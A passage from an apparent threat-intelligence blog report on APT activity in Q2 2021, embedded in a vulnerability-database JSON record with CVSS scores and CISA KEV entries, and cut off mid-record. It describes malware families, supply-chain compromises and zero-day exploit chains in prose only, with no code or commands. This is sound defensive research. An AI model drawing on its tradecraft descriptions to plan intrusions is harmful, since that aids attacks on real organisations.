While investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading Command Shell and File Manager plugins in memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.

Earlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia.
The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.

We discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools, but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor that we call "TPCon" as a primary implant. It was later used both to perform reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found multiple additional malware families shared by Chinese-speaking actors, such as the ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019.
Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.

## Middle East

BlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer-related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.

We previously covered a WildPressure campaign against targets in the Middle East. Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol are quite recognisable across all programming languages used by the attackers.
The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.

We discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts in February for threat actor groups using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims concentrated in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly on government and diplomatic entities; however, we also noticed an unusual targeting of law firms.

GoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage.
Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanying detection logs, portrays a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.

## Southeast Asia and Korean Peninsula

The ScarCruft group is a geopolitically motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.

In May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators.
Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.

BlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research on BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain- or cryptocurrency-related company websites for this campaign, to lure potential victims and initiate the infection process.
Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection; they have now been replaced by weaponized Word documents.

We have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has characteristic habits when interactively working with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware.
This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.

We recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs point to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by rapid replication through removable devices or by an unknown infection vector, such as a watering hole focusing on the Philippines.

We recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data.
Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control whether Dropbox or another, hard-coded server is used to exfiltrate stolen files.

## Other interesting discoveries

Expanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.

Various marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer, whom we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel.
Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.

In another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of its early activity last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor.
Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.

On 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between 31 January and 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash Uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines), and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash Uploader script, as well as identify some possibly associated additional malicious servers.

An e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager.
Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studios on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.

A few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, set up around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.

On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.
While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as part of the June Patch Tuesday. The exploit chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turn connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).

On April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related, and that these were just rumors circulating in the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above.
This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure: one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.

Cooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to originate from the United Nations using up-to-date related themes, or by setting up websites for non-existent organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.

## Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we've seen in Q2 2021:

 * We have reported several supply-chain attacks in recent months.
While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.
 * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker and Pulse Secure attacks, as well as the Exchange server vulnerabilities.
 * APT threat actors typically refresh and update their toolsets: this includes not only support for new platforms but also the use of additional languages, as seen in WildPressure's macOS-supported Python malware.
 * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, ScarCruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.

As always, we would note that our reports are the product of our visibility into the threat landscape.
However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T10:00:46", "type": "securelist", "title": "APT trends report Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-07-29T10:00:46", "id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerability. 
This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31199", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerability. 
This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Enhanced Cryptographic Provider Privilege Escalation Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31201", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Desktop Window Manager (DWM) Core Library Privilege Escalation Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft DWM Core Library Privilege Escalation 
Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-33739", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Adobe Acrobat and Reader Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-28550", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Information Disclosure 
Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31955", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Chromium V8 JavaScript Engine Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-21224"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21224", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows NTFS Privilege Escalation Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows NTFS Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": 
